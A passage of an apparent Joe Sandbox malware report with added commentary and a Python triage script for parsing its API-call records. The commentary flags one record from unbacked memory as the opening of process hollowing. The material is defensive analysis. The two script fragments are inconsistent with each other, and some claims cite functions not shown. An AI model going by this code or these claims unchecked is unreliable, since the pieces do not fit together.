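    for row in triage(SAMPLE_REPORT):
        print(f"{row['entry']} pe_backed={row['pe_backed']} score={row['score']}", *row["reasons"], sep="\n    ")
```

Run it as a script to print the ranking. The two 00D40000 functions come out on top because they issue Win32 calls from private memory that has no image on disk and combine open, allocate and read; the AutoIt runtime function in the 00E10000 image scores zero. When only the "APIs" list is fed in (no graph line), the chain rule does not fire for 00D425C0, since VirtualAlloc and ReadFile appear only on its graph nodes, so the graph lines are worth keeping in the input.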

                                            Control-flow Graph

                                            Control-flow graph (rendered figure not reproduced): basic blocks e1410d-e1420e plus an out-of-line region e4d5dd-e4d633; nodes call LoadStringW and Shell_NotifyIconW, with internal calls to e17b76, e17d2c, e17c8e, e17143, e33020, e1463e, e32ffc, e15a64, e181a7 and e17e0b. Executed/not-executed colouring is lost.
                                            APIs
                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E4D5EC
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • _memset.LIBCMT ref: 00E1418D
                                            • _wcscpy.LIBCMT ref: 00E141E1
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E141F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                            • String ID: Line:
                                            • API String ID: 3942752672-1585850449
                                            • Opcode ID: 3c3ff8db7ae325199e8c25faa80a32f4970ad0141228b828b0b9478f1f834978
                                            • Instruction ID: 205c0044a0c8f073ab6a83e1de312c34248070794131ae01ae41533b5c4919f0
                                            • Opcode Fuzzy Hash: 3c3ff8db7ae325199e8c25faa80a32f4970ad0141228b828b0b9478f1f834978
                                            • Instruction Fuzzy Hash: 1D319CB1109304AED721EB60EC46FDA77E8AF44714F10651FF195B21A1EB74A6C8CB92

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                            • String ID:
                                            • API String ID: 1559183368-0
                                            APIs
                                              • Part of subcall function 00E14F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14F6F
                                            • _free.LIBCMT ref: 00E4E68C
                                            • _free.LIBCMT ref: 00E4E6D3
                                              • Part of subcall function 00E16BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E16D0D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                            • API String ID: 2861923089-1757145024
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E135A1,SwapMouseButtons,00000004,?), ref: 00E135D4
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E135A1,SwapMouseButtons,00000004,?,?,?,?,00E12754), ref: 00E135F5
                                            • RegCloseKey.KERNELBASE(00000000,?,?,00E135A1,SwapMouseButtons,00000004,?,?,?,?,00E12754), ref: 00E13617
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Control Panel\Mouse
                                            • API String ID: 3677997916-824357125
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D41A5B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D41AF1
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D41B13
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            APIs
                                              • Part of subcall function 00E15045: _fseek.LIBCMT ref: 00E1505D
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AAE
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AC1
                                            • _free.LIBCMT ref: 00E7992C
                                            • _free.LIBCMT ref: 00E79933
                                            • _free.LIBCMT ref: 00E7999E
                                              • Part of subcall function 00E32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E39C64), ref: 00E32FA9
                                              • Part of subcall function 00E32F95: GetLastError.KERNEL32(00000000,?,00E39C64), ref: 00E32FBB
                                            • _free.LIBCMT ref: 00E799A6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                            • String ID:
                                            • API String ID: 1552873950-0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: AU3!P/$EA06
                                            • API String ID: 4104443479-182974850
                                            APIs
                                            • _memset.LIBCMT ref: 00E4EE62
                                            • GetOpenFileNameW.COMDLG32(?), ref: 00E4EEAC
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                              • Part of subcall function 00E309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E309F4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Name$Path$FileFullLongOpen_memset
                                            • String ID: X
                                            • API String ID: 3777226403-3081909835
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __fread_nolock_memmove
                                            • String ID: EA06
                                            • API String ID: 1988441806-3962188686
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00E79B82
                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E79B99
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Temp$FileNamePath
                                            • String ID: aut
                                            • API String ID: 3285503233-3010740371
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            • _memset.LIBCMT ref: 00E14401
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E144A6
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E144C3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_$_memset
                                            • String ID:
                                            • API String ID: 1505330794-0
                                            APIs
                                            • __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3A3AB: __NMSG_WRITE.LIBCMT ref: 00E3A3D2
                                              • Part of subcall function 00E3A3AB: __NMSG_WRITE.LIBCMT ref: 00E3A3DC
                                            • __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3A408: GetModuleFileNameW.KERNEL32(00000000,00ED43BA,00000104,?,00000001,00000000), ref: 00E3A49A
                                              • Part of subcall function 00E3A408: ___crtMessageBoxW.LIBCMT ref: 00E3A548
                                              • Part of subcall function 00E332DF: ___crtCorExitProcess.LIBCMT ref: 00E332E5
                                              • Part of subcall function 00E332DF: ExitProcess.KERNEL32 ref: 00E332EE
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                            • String ID:
                                            • API String ID: 1372826849-0
                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E797D2,?,?,?,?,?,00000004), ref: 00E79B45
                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E79B5B
                                            • CloseHandle.KERNEL32(00000000,?,00E797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E79B62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            APIs
                                            • _free.LIBCMT ref: 00E78FA5
                                              • Part of subcall function 00E32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E39C64), ref: 00E32FA9
                                              • Part of subcall function 00E32F95: GetLastError.KERNEL32(00000000,?,00E39C64), ref: 00E32FBB
                                            • _free.LIBCMT ref: 00E78FB6
                                            • _free.LIBCMT ref: 00E78FC8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                            • Instruction ID: d7a470d9e7b4ed1328735d498c41ac620e228bb5c9ebaf2e8a6b909a0ee84a92
                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                            • Instruction Fuzzy Hash: 92E012B17097054ACA28A578AE48AA35BEF5F48364B18281DF54DFB142DE24E841C124
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CALL
                                            • API String ID: 0-4196123274
                                            • Opcode ID: 5411f49255bc4172859bf510737d0dc968bfe10606e3ce256217a2297cfd30d9
                                            • Instruction ID: c4225fcd6cb8d6d387d2b843e944696e8c93fe85b47947dda92a2f52b4551e50
                                            • Opcode Fuzzy Hash: 5411f49255bc4172859bf510737d0dc968bfe10606e3ce256217a2297cfd30d9
                                            • Instruction Fuzzy Hash: 3C223B70609241DFC724DF14C494BAABBE1FF45304F19996DE89AAB262D731EC85CB82
                                            APIs
                                            • IsThemeActive.UXTHEME ref: 00E14992
                                              • Part of subcall function 00E335AC: __lock.LIBCMT ref: 00E335B2
                                              • Part of subcall function 00E335AC: DecodePointer.KERNEL32(00000001,?,00E149A7,00E681BC), ref: 00E335BE
                                              • Part of subcall function 00E335AC: EncodePointer.KERNEL32(?,?,00E149A7,00E681BC), ref: 00E335C9
                                              • Part of subcall function 00E14A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E14A73
                                              • Part of subcall function 00E14A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E14A88
                                              • Part of subcall function 00E13B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E13B7A
                                              • Part of subcall function 00E13B4C: IsDebuggerPresent.KERNEL32 ref: 00E13B8C
                                              • Part of subcall function 00E13B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00ED62F8,00ED62E0,?,?), ref: 00E13BFD
                                              • Part of subcall function 00E13B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E13C81
                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E149D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                            • String ID:
                                            • API String ID: 1438897964-0
                                            • Opcode ID: 4eeb6598803d0499e3085eac8bbfaebf52ba4039684911d7c58abb384c0230f0
                                            • Instruction ID: 03ddd6e71933f31507341e19955e8ee7f47c1fae827a931afb0a506471fa6891
                                            • Opcode Fuzzy Hash: 4eeb6598803d0499e3085eac8bbfaebf52ba4039684911d7c58abb384c0230f0
                                            • Instruction Fuzzy Hash: 1F118C719193119FC700DF2AED0594ABFE8EF94710F00451FF095A72B2DB709588CB92
                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E15981,?,?,?,?), ref: 00E15E27
                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E15981,?,?,?,?), ref: 00E4E19C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 55717ee110a2f79faab11c635d1f69bc367e5e0101ae12752b432f42ef88fd4f
                                            • Instruction ID: b3bc0dfa2de298657af5e5c3d19001c9cf6b375c106c032d5cd9fc5a7baa3450
                                            • Opcode Fuzzy Hash: 55717ee110a2f79faab11c635d1f69bc367e5e0101ae12752b432f42ef88fd4f
                                            • Instruction Fuzzy Hash: 74019671684708FEF3640E14DC86FA6379CAB0176CF108315FAE57A1D0C6B01D858B54
                                            APIs
                                              • Part of subcall function 00E3594C: __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3594C: __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3594C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            • std::exception::exception.LIBCMT ref: 00E3102C
                                            • __CxxThrowException@8.LIBCMT ref: 00E31041
                                              • Part of subcall function 00E387DB: RaiseException.KERNEL32(?,?,?,00ECBAF8,00000000,?,?,?,?,00E31046,?,00ECBAF8,?,00000001), ref: 00E38830
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 3902256705-0
                                            • Opcode ID: 0af7eee0333cd242ffc0a4fabd885480d05d021931dc6033a1a7da0774880180
                                            • Instruction ID: b45a9177a0c082bf12c81479c09df9e14a0812d9f3bd3b7674e0b8a3ea528101
                                            • Opcode Fuzzy Hash: 0af7eee0333cd242ffc0a4fabd885480d05d021931dc6033a1a7da0774880180
                                            • Instruction Fuzzy Hash: CDF0283550030DA6CB24BA98ED1EADF7FEC9F01354F10206EF904B6982DFB19A80D6D0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __lock_file_memset
                                            • String ID:
                                            • API String ID: 26237723-0
                                            • Opcode ID: 32dfb454078785b10238ab2a5b938c11824cc34e140b299b2a624320dce20dca
                                            • Instruction ID: 62011afde536c4029db98fae884b2807da115b9fae14b1e085f568f6156e4c38
                                            • Opcode Fuzzy Hash: 32dfb454078785b10238ab2a5b938c11824cc34e140b299b2a624320dce20dca
                                            • Instruction Fuzzy Hash: 9E016C72C00709EBCF16AF658D0E99F7FA1AF40360F155229F8147B261DB358A11DF91
                                            APIs
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • __lock_file.LIBCMT ref: 00E3561B
                                              • Part of subcall function 00E36E4E: __lock.LIBCMT ref: 00E36E71
                                            • __fclose_nolock.LIBCMT ref: 00E35626
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                            • String ID:
                                            • API String ID: 2800547568-0
                                            • Opcode ID: df405f7693be4ea6cf385f8484b28a4083b83d025f3a4c5559e433a10c84e272
                                            • Instruction ID: 712d47d955b42d6566c41af698df9547f71bbbf167ee82c4238f3ba57cd045f1
                                            • Opcode Fuzzy Hash: df405f7693be4ea6cf385f8484b28a4083b83d025f3a4c5559e433a10c84e272
                                            • Instruction Fuzzy Hash: F0F09072904B05DAD721AB75890BB6EAFE16F40334F55A249B814BB2C1CF7C8A01DB95
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D41A5B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D41AF1
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D41B13
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                            • Instruction ID: cea8394b1aec5cfdd7497b92135dd4e948d60c63b07020e49f010d90f8cef1a0
                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                            • Instruction Fuzzy Hash: A212BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4F85CB5A
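The record above is the one a practitioner should stop at: it comes from a region at 00D40000 that is not backed by a PE image ("based on PE: false", i.e. code that was unpacked or written into memory at runtime), and its direct calls are CreateProcessW, then Wow64GetThreadContext with ContextFlags 0x10007 (CONTEXT_FULL for x86), then a 4-byte ReadProcessMemory, which is consistent with the classic process-hollowing opening sequence (spawn a child, fetch its thread context, read a pointer out of it) and with the "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures at the top of this report. The following script is an added example, not part of Joe Sandbox or of this report: it parses the "APIs" and "Memory Dump Source" line shapes exactly as they appear in these records and applies a triage heuristic of its own (the stage grouping, the CONTEXT bit names from winnt.h and the sample text are this example's assumptions; the sample's first record is copied from the lines above, the second is constructed from this report's CreateFileW and RtlFreeHeap lines as a benign control).

```python
"""Triage helper for Joe Sandbox 'APIs' / 'Memory Dump Source' function records.
Added example, not part of Joe Sandbox or of this report. The two line shapes
parsed here are taken from the report's records; the staging heuristic, the
x86 CONTEXT bit names (winnt.h) and the sample text are this example's own."""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; nested entries
# carry a "Part of subcall function XXXX:" prefix.
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
SOURCE_LINE = re.compile(
    r"Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<offset>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")

# x86 CONTEXT.ContextFlags bits; CONTEXT_FULL == 0x10007 (i386|CONTROL|INTEGER|SEGMENTS).
CONTEXT_BITS = {0x10000: "i386", 0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS",
                0x8: "FLOATING_POINT", 0x10: "DEBUG_REGISTERS", 0x20: "EXTENDED_REGISTERS"}
CONTEXT_FULL = 0x10007

# Hypothetical grouping of the APIs that make up a process-hollowing sequence.
HOLLOW_STAGES = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
               "NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "resume": {"ResumeThread", "NtResumeThread"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    in_subcall: bool

@dataclass
class FunctionRecord:
    offset: str
    based_on_pe: bool
    apis: list = field(default_factory=list)

def parse_records(text):
    """Attach each run of API lines to the 'Memory Dump Source' line that follows it."""
    records, pending = [], []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            pending.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
            continue
        m = SOURCE_LINE.search(line)
        if m:
            records.append(FunctionRecord(m["offset"], m["pe"] == "true", pending))
            pending = []
    return records

def decode_bits(value, table):
    """Names of the flag bits set in value, in table order."""
    return [name for bit, name in table.items() if (value & bit) == bit]

def triage(record):
    """Findings for one record: unbacked code, hollowing stages, ContextFlags value."""
    findings = []
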